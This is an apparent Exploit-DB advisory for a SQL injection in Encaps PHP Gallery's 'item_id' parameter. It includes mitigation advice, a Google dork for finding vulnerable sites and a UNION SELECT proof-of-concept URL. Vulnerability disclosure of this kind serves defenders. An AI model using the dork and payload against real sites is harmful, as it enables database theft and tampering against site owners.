Exploit Title: Encaps PHP Gallery SQL Injection

vendor:

Encaps PHP Gallery

by:

Daniel Godoy

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Encaps PHP Gallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: encaps.net/software/encapsgallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

Exploit Title: Encaps PHP Gallery SQL Injection

Encaps PHP Gallery is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The vulnerable parameter is 'item_id' which is not properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can use this vulnerability to bypass authentication, access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to avoid SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Encaps PHP Gallery SQL Injection
# Date: 14/03/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Encaps PHP Gallery
# http://www.encaps.net/software/encapsgallery/
# Tested on: Linux
# Dork: "shopcart.php?action=add&item_id="
  
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

[PoC]

http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--